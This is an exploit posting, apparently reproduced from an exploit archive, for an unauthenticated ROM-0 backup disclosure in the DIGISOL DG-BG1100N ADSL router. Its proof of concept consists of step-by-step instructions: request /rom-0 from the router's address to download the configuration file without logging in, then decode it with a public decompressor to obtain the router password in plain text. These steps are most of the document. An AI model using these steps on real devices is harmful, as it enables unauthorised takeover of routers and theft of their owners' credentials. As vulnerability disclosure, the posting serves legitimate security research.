DIGISOL DG-BG1100N ROM-0 Backup File Disclosure

DIGISOL DG-BG1100N suffers from a ROM-0 backup disclosure vulnerability.

MD5 | 0a0fbe11323fb171cf44fe97f8d9d71c

# Exploit Title : ROM-0 Backup File Disclosure on DIGISOL
# Date                   : 24-08-2017
# Exploit Author : Sudin nk
# Vendor Homepage: http://www.digisol.com
# Tested Routers : DG-BG1100N ADSL 2/2+ Modem Wifi Router
# Tested on      : Parrotsec x86_64


ROM-0 Backup File Disclosure on DIGISOL
__________________________________________________________________________________________
____________________________
A dangerous vulnerability present on many network devices which are using
RomPager.The rom-0 file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by
a simple GET request.


POC:
> open the router IP address in your web browser, http://192.168.1.1
> Now add /rom-0 to your target address.Then a rom-0 file will be downloaded
 http://192.168.1.1/rom-0
> You can find the router password using rom-0 configuration decompressor.

Here i used the website http://www.routerpwn.com/zynos/ for decompression.Once it decoded
you can get plain text passwords

Thank You.

Regards,
Sudin nk

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

DIGISOL DG-BG1100N ROM-0 Backup File Disclosure